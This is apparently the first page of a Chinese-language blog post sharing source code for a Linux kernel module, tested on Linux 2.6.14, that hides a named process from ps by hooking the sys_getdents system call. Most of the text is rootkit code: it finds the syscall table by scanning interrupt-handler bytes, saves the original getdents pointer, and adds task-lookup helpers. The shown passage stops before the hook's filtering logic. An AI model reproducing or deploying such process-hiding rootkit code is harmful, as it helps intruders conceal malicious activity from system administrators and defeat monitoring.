很早以前的小程序,比較簡單但是覺得有趣
原理很簡單,Linux查看進程的命令ps是通過系統調用sys_getdents實現,sys_getdents用戶獲取一個指定路徑下的目錄條目,實際上就是枚舉
/proc/ 下的pid,這樣我們只需要hook一下sys_getdents,把相應的要隱藏的pid信息去掉即可。
以下是LKM代碼,在Linux-2.6.14測試並運行成功
#include <linux/module.h>
#include <linux/kernel.h>
#include <asm/unistd.h>
#include <linux/types.h>
#include <linux/dirent.h>
#include <linux/string.h>
#include <linux/file.h>
#include <linux/fs.h>
#define CALLOFF 100
//使用模塊參數來定義需要隱藏的進程名
char *processname;
module_param(processname, charp, 0);
struct {
unsigned short limit;
unsigned int base;
} __attribute__ ((packed)) idtr;
struct {
unsigned short off1;
unsigned short sel;
unsigned char none,
flags;
unsigned short off2;
} __attribute__ ((packed)) * idt;
void** sys_call_table;
asmlinkage long (*orig_getdents)(unsigned int fd, struct linux_dirent64 __user *dirp, unsigned int count);
char * findoffset(char *start)
{
char *p;
for (p = start; p < start + CALLOFF; p++)
if (*(p + 0) == '\xff' && *(p + 1) == '\x14' && *(p + 2) == '\x85')
return p;
return NULL;
}
int myatoi(char *str)
{
int res = 0;
int mul = 1;
char *ptr;
for (ptr = str + strlen(str) - 1; ptr >= str; ptr--) {
if (*ptr < '0' || *ptr > '9')
return (-1);
res += (*ptr - '0') * mul;
mul *= 10;
}
return (res);
}
struct task_struct *get_task(pid_t pid)
{
struct task_struct *p = get_current(),*entry=NULL;
list_for_each_entry(entry,&(p->tasks),tasks)
{
if(entry->pid == pid)
{
printk("pid found\n");
return entry;
}
}
return NULL;
}
static inline char *get_name(struct task_struct *p, char *buf)
{
int i;
char *name;
name = p->comm;
i = sizeof(p->comm);
do {
unsigned char c = *name;
name++;
i--;
*buf = c;
if (!c)
break;
if (c == '\\') {
buf[1] = c;
buf += 2;
continue;
}
if (c == '\n') {
buf[0] = '\\';
buf[1] = 'n';
buf += 2;
continue;
}
buf++;
}
while (i);
*buf = '\n';
return buf + 1;
}
int get_process(pid_t pid)
{
struct task_struct *task = get_task(pid);
char *buffer[64] = {0};
if (task)
{
12下一頁
